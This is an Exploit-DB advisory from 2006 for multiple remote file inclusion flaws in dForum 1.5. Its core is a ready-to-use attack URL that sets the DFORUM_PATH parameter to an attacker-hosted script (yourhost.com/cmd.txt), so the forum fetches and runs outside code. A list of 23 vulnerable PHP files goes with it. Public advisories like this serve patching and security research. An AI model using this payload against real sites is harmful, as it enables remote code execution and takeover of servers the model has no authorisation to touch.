dForum 1.5 - 'DFORUM_PATH' Multiple Remote File Inclusions

EDB-ID:

1706

Author:

nukedx

Type:

webapps

Platform:

PHP

Published:

2006-04-21

dForum <= 1.5 (DFORUM_PATH) Multiple Remote File Inclusion Vulnerabilities.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploit works on dForum <= 1.5
http://[victim]/[dForumPath]/[filename]?DFORUM_PATH=http://yourhost.com/cmd.txt?
Files ->
about.php
admin.php
anmelden.php
closethread.php
config.php
delpost.php
delthread.php
dfcode.php
download.php
editanoc.php
forum.php
login.php
makethread.php
menu.php
newthread.php
openthread.php
overview.php
post.php
suchen.php
user.php
userconfig.php
userinfo.php
verwalten.php
Original advisory: http://www.nukedx.com/?viewdoc=27
# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]